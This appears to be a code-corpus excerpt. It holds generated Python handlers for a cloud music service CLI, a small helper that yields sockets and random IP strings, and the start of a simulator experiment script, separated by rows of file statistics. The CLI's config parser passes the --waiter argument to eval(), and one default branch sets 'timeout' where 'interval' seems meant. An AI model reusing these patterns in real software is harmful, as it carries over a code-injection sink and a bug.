endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeMusicRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeMusic(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeCloudMusic(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeCloudMusicRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeCloudMusic(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyMusicOnShelves(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyMusicOnShelvesRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.ModifyMusicOnShelves(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribePkgOfflineMusic(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribePkgOfflineMusicRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribePkgOfflineMusic(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribePackageItems(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribePackageItemsRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribePackageItems(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doTakeMusicOffShelves(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.TakeMusicOffShelvesRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.TakeMusicOffShelves(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doReportData(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ReportDataRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.ReportData(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeCloudMusicPurchased(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeCloudMusicPurchasedRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeCloudMusicPurchased(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doPutMusicOnTheShelves(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.PutMusicOnTheShelvesRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.PutMusicOnTheShelves(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doSearchKTVMusics(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.SearchKTVMusicsRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.SearchKTVMusics(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
CLIENT_MAP = {
"v20190916": ame_client_v20190916,
}
MODELS_MAP = {
"v20190916": models_v20190916,
}
ACTION_MAP = {
"DescribeKTVMusicDetail": doDescribeKTVMusicDetail,
"DescribeItemById": doDescribeItemById,
"DescribeStations": doDescribeStations,
"DescribePackages": doDescribePackages,
"DescribeLyric": doDescribeLyric,
"DescribeMusicSaleStatus": doDescribeMusicSaleStatus,
"DescribeItems": doDescribeItems,
"DescribeKTVPlaylistDetail": doDescribeKTVPlaylistDetail,
"DescribeAuthInfo": doDescribeAuthInfo,
"DescribeKTVPlaylists": doDescribeKTVPlaylists,
"DescribeMusic": doDescribeMusic,
"DescribeCloudMusic": doDescribeCloudMusic,
"ModifyMusicOnShelves": doModifyMusicOnShelves,
"DescribePkgOfflineMusic": doDescribePkgOfflineMusic,
"DescribePackageItems": doDescribePackageItems,
"TakeMusicOffShelves": doTakeMusicOffShelves,
"ReportData": doReportData,
"DescribeCloudMusicPurchased": doDescribeCloudMusicPurchased,
"PutMusicOnTheShelves": doPutMusicOnTheShelves,
"SearchKTVMusics": doSearchKTVMusics,
}
AVAILABLE_VERSION_LIST = [
"v20190916",
]
def action_caller():
return ACTION_MAP
def parse_global_arg(parsed_globals):
g_param = parsed_globals
is_exist_profile = True
if not parsed_globals["profile"]:
is_exist_profile = False
g_param["profile"] = "default"
configure_path = os.path.join(os.path.expanduser("~"), ".tccli")
is_conf_exist, conf_path = Utils.file_existed(configure_path, g_param["profile"] + ".configure")
is_cred_exist, cred_path = Utils.file_existed(configure_path, g_param["profile"] + ".credential")
conf = {}
cred = {}
if is_conf_exist:
conf = Utils.load_json_msg(conf_path)
if is_cred_exist:
cred = Utils.load_json_msg(cred_path)
if not (isinstance(conf, dict) and isinstance(cred, dict)):
raise ConfigurationError(
"file: %s or %s is not json format"
% (g_param["profile"] + ".configure", g_param["profile"] + ".credential"))
if OptionsDefine.Token not in cred:
cred[OptionsDefine.Token] = None
if not is_exist_profile:
if os.environ.get(OptionsDefine.ENV_SECRET_ID) and os.environ.get(OptionsDefine.ENV_SECRET_KEY):
cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
cred[OptionsDefine.Token] = os.environ.get(OptionsDefine.ENV_TOKEN)
if os.environ.get(OptionsDefine.ENV_REGION):
conf[OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)
if os.environ.get(OptionsDefine.ENV_ROLE_ARN) and os.environ.get(OptionsDefine.ENV_ROLE_SESSION_NAME):
cred[OptionsDefine.RoleArn] = os.environ.get(OptionsDefine.ENV_ROLE_ARN)
cred[OptionsDefine.RoleSessionName] = os.environ.get(OptionsDefine.ENV_ROLE_SESSION_NAME)
for param in g_param.keys():
if g_param[param] is None:
if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId, OptionsDefine.Token]:
if param in cred:
g_param[param] = cred[param]
elif not g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
raise ConfigurationError("%s is invalid" % param)
elif param in [OptionsDefine.Region, OptionsDefine.Output]:
if param in conf:
g_param[param] = conf[param]
else:
raise ConfigurationError("%s is invalid" % param)
elif param.replace('_', '-') in [OptionsDefine.RoleArn, OptionsDefine.RoleSessionName]:
if param.replace('_', '-') in cred:
g_param[param] = cred[param.replace('_', '-')]
try:
if g_param[OptionsDefine.ServiceVersion]:
g_param[OptionsDefine.Version] = "v" + g_param[OptionsDefine.ServiceVersion].replace('-', '')
else:
version = conf["ame"][OptionsDefine.Version]
g_param[OptionsDefine.Version] = "v" + version.replace('-', '')
if g_param[OptionsDefine.Endpoint] is None:
g_param[OptionsDefine.Endpoint] = conf["ame"][OptionsDefine.Endpoint]
except Exception as err:
raise ConfigurationError("config file:%s error, %s" % (conf_path, str(err)))
if g_param[OptionsDefine.Version] not in AVAILABLE_VERSION_LIST:
raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
if g_param[OptionsDefine.Waiter]:
param = eval(g_param[OptionsDefine.Waiter])
if 'expr' not in param:
raise Exception('`expr` in `--waiter` must be defined')
if 'to' not in param:
raise Exception('`to` in `--waiter` must be defined')
if 'timeout' not in param:
if 'waiter' in conf and 'timeout' in conf['waiter']:
param['timeout'] = conf['waiter']['timeout']
else:
param['timeout'] = 180
if 'interval' not in param:
if 'waiter' in conf and 'interval' in conf['waiter']:
param['interval'] = conf['waiter']['interval']
else:
param['timeout'] = 5
param['interval'] = min(param['interval'], param['timeout'])
g_param['OptionsDefine.WaiterInfo'] = param
# 如果在配置文件中读取字段的值,python2中的json.load函数会读取unicode类型的值,因此这里要转化类型
if six.PY2:
for key, value in g_param.items():
if isinstance(value, six.text_type):
g_param[key] = value.encode('utf-8')
return g_param
| 51.687166 | 155 | 0.677754 | 6,268 | 57,993 | 6.048979 | 0.037013 | 0.09574 | 0.28614 | 0.123144 | 0.883344 | 0.876461 | 0.873137 | 0.868021 | 0.861849 | 0.856574 | 0 | 0.005102 | 0.188902 | 57,993 | 1,121 | 156 | 51.733274 | 0.800948 | 0.004845 | 0 | 0.764078 | 0 | 0 | 0.136805 | 0.069061 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021359 | false | 0 | 0.015534 | 0.000971 | 0.038835 | 0.019417 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c714f424f8dfd87a02c18685306ef83f2b8ce1c3 | 280 | py | Python | tool_module.py | hslee1539/p2p | c472271eff409ef345f29ef32f562a5f5e00d3ba | [
"MIT"
] | null | null | null | tool_module.py | hslee1539/p2p | c472271eff409ef345f29ef32f562a5f5e00d3ba | [
"MIT"
] | null | null | null | tool_module.py | hslee1539/p2p | c472271eff409ef345f29ef32f562a5f5e00d3ba | [
"MIT"
] | null | null | null | import random
import socket
def socketGenerator(count):
for i in range (count):
yield socket.socket()
def generateRandomIPAddress() -> str:
return "{0}.{1}.{2}.{3}".format(random.randint(1,255), random.randint(0,255),random.randint(0,255),random.randint(0,255))
| 28 | 125 | 0.689286 | 40 | 280 | 4.825 | 0.525 | 0.26943 | 0.248705 | 0.264249 | 0.279793 | 0.279793 | 0.279793 | 0.279793 | 0.279793 | 0 | 0 | 0.082645 | 0.135714 | 280 | 9 | 126 | 31.111111 | 0.714876 | 0 | 0 | 0 | 1 | 0 | 0.053571 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.285714 | 0.142857 | 0.714286 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
c7cbb680595ec9bb564bf4a46d9de82f224a29de | 9,982 | py | Python | sim_prev/py/run_experiments.py | wuxian4118/YAPS | be77016c4ce6309be81c6fd0ce7b7f628a3fa29e | [
"BSD-3-Clause"
] | null | null | null | sim_prev/py/run_experiments.py | wuxian4118/YAPS | be77016c4ce6309be81c6fd0ce7b7f628a3fa29e | [
"BSD-3-Clause"
] | 1 | 2021-06-18T19:12:19.000Z | 2021-06-18T19:12:19.000Z | sim_prev/py/run_experiments.py | wuxian4118/YAPS | be77016c4ce6309be81c6fd0ce7b7f628a3fa29e | [
"BSD-3-Clause"
] | 1 | 2021-06-18T07:01:16.000Z | 2021-06-18T07:01:16.000Z | #!/usr/bin/python
import subprocess
import threading
import multiprocessing
import os
''' backup of an old config
conf_str_incast32 =
init_cwnd: 12
max_cwnd: 15
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 33
